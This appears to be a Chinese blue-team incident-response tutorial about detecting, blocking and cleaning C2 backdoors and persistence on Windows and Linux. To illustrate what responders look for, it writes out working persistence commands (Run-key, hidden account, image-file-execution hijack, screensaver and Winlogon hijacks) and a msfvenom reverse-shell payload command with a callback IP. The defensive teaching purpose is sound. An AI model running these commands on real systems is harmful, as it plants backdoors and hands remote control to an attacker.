蓝队技能-应急响应篇C2后门权限维持手法WindowsLinux基线检查排查封锁清理

本文主要是介绍蓝队技能-应急响应篇C2后门权限维持手法WindowsLinux基线检查排查封锁清理,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

在这里插入图片描述

知识点

1、应急响应-C2后门-排查&封锁
2、应急响应-权限维持-排查&清理
3、应急响应-基线检测-整改&排查

演示案例-蓝队技能-C2后门&权限维持-基线检查&查杀封锁-Windows

1、常规C2后门-分析检测

无隐匿手法

在这里插入图片描述
也可以把怀疑的exe程序上传到沙箱上分析
在这里插入图片描述

有隐匿手法

CDN,云函数,中转等(涉及溯源和反制)

处置手段

清除:删除文件

封锁:防火墙都有出入站规则,需要自己判断在哪里设置封锁策略
1、防火墙阻止程序
(一般没啥用,变个文件名就不行了)
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
2、防火墙阻止网络链接-IP
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

2、权限维持技术-分析检测

自启动测试

REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "backdoor" /t REG_SZ /F /D "C:\shell.exe" //把shell.exe放入启动项并命名为backdoor

在这里插入图片描述
在这里插入图片描述

隐藏账户

net user xiaodi$ xiaodi!@#X123 /add

在这里插入图片描述
可以使用PCHunter工具查看当前系统用户
在这里插入图片描述
或者

运行-lusrmgr.msc-本地用户和组-用户

在这里插入图片描述

映像劫持

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe /c c:/shell.exe"

在这里插入图片描述
可以使用PCHunter或者火绒剑工具查看
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

屏保&登录

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "C:\shell.exe" /f //进入锁屏后会触发shell.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Userinit" /t REG_SZ /F /D "C:\shell.exe" //有人登录这台计算机的时候就会触发shell.exe

在这里插入图片描述
在这里插入图片描述

3、Rookit后门-分析检测

后续讲到

4、Web的内存马-分析检测

后续讲到

5、基线检测配合分析项目

Golin

WindowsBaselineAssistant

在这里插入图片描述

d-eyes

在这里插入图片描述
在这里插入图片描述

FindAll

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

演示案例-蓝队技能-C2后门&权限维持-基线检查&查杀封锁-Linux

1、常规C2后门-分析检测

无隐匿手法

常规后门:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=47.94.236.117 LPORT=7777 -f elf >shell.elf
netstat -anpt

在这里插入图片描述

有隐匿手法

CDN,云函数,中转等(涉及溯源和反制)

处置手段

删除文件,防火墙阻止程序或IP域名等

2、权限维持技术-分析检测

GScan

Golin

d-eyes

在这里插入图片描述

Whoamifuck

Ashro_linux

linuxcheckshoot

3、Rookit后门-分析检测

后续讲到

4、Web的内存马-分析检测

后续讲到

这篇关于蓝队技能-应急响应篇C2后门权限维持手法WindowsLinux基线检查排查封锁清理的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1092285

相关文章

Spring Security+JWT如何实现前后端分离权限控制

《SpringSecurity+JWT如何实现前后端分离权限控制》本篇将手把手教你用SpringSecurity+JWT搭建一套完整的登录认证与权限控制体系,具有很好的参考价值,希望对大家... 目录Spring Security+JWT实现前后端分离权限控制实战一、为什么要用 JWT?二、JWT 基本结构

html5的响应式布局的方法示例详解

《html5的响应式布局的方法示例详解》:本文主要介绍了HTML5中使用媒体查询和Flexbox进行响应式布局的方法,简要介绍了CSSGrid布局的基础知识和如何实现自动换行的网格布局,详细内容请阅读本文,希望能对你有所帮助... 一 使用媒体查询响应式布局        使用的参数@media这是常用的

python logging模块详解及其日志定时清理方式

《pythonlogging模块详解及其日志定时清理方式》:本文主要介绍pythonlogging模块详解及其日志定时清理方式,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地... 目录python logging模块及日志定时清理1.创建logger对象2.logging.basicCo

springboot filter实现请求响应全链路拦截

《springbootfilter实现请求响应全链路拦截》这篇文章主要为大家详细介绍了SpringBoot如何结合Filter同时拦截请求和响应,从而实现​​日志采集自动化,感兴趣的小伙伴可以跟随小... 目录一、为什么你需要这个过滤器?​​​二、核心实现:一个Filter搞定双向数据流​​​​三、完整代码

Spring Security基于数据库的ABAC属性权限模型实战开发教程

《SpringSecurity基于数据库的ABAC属性权限模型实战开发教程》:本文主要介绍SpringSecurity基于数据库的ABAC属性权限模型实战开发教程,本文给大家介绍的非常详细,对大... 目录1. 前言2. 权限决策依据RBACABAC综合对比3. 数据库表结构说明4. 实战开始5. MyBA

SpringBoot首笔交易慢问题排查与优化方案

《SpringBoot首笔交易慢问题排查与优化方案》在我们的微服务项目中,遇到这样的问题:应用启动后,第一笔交易响应耗时高达4、5秒,而后续请求均能在毫秒级完成,这不仅触发监控告警,也极大影响了用户体... 目录问题背景排查步骤1. 日志分析2. 性能工具定位优化方案:提前预热各种资源1. Flowable

一文详解SpringBoot响应压缩功能的配置与优化

《一文详解SpringBoot响应压缩功能的配置与优化》SpringBoot的响应压缩功能基于智能协商机制,需同时满足很多条件,本文主要为大家详细介绍了SpringBoot响应压缩功能的配置与优化,需... 目录一、核心工作机制1.1 自动协商触发条件1.2 压缩处理流程二、配置方案详解2.1 基础YAML

SpringBoot启动报错的11个高频问题排查与解决终极指南

《SpringBoot启动报错的11个高频问题排查与解决终极指南》这篇文章主要为大家详细介绍了SpringBoot启动报错的11个高频问题的排查与解决,文中的示例代码讲解详细,感兴趣的小伙伴可以了解一... 目录1. 依赖冲突:NoSuchMethodError 的终极解法2. Bean注入失败:No qu

如何解决Spring MVC中响应乱码问题

《如何解决SpringMVC中响应乱码问题》:本文主要介绍如何解决SpringMVC中响应乱码问题,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录Spring MVC最新响应中乱码解决方式以前的解决办法这是比较通用的一种方法总结Spring MVC最新响应中乱码解

Java程序运行时出现乱码问题的排查与解决方法

《Java程序运行时出现乱码问题的排查与解决方法》本文主要介绍了Java程序运行时出现乱码问题的排查与解决方法,包括检查Java源文件编码、检查编译时的编码设置、检查运行时的编码设置、检查命令提示符的... 目录一、检查 Java 源文件编码二、检查编译时的编码设置三、检查运行时的编码设置四、检查命令提示符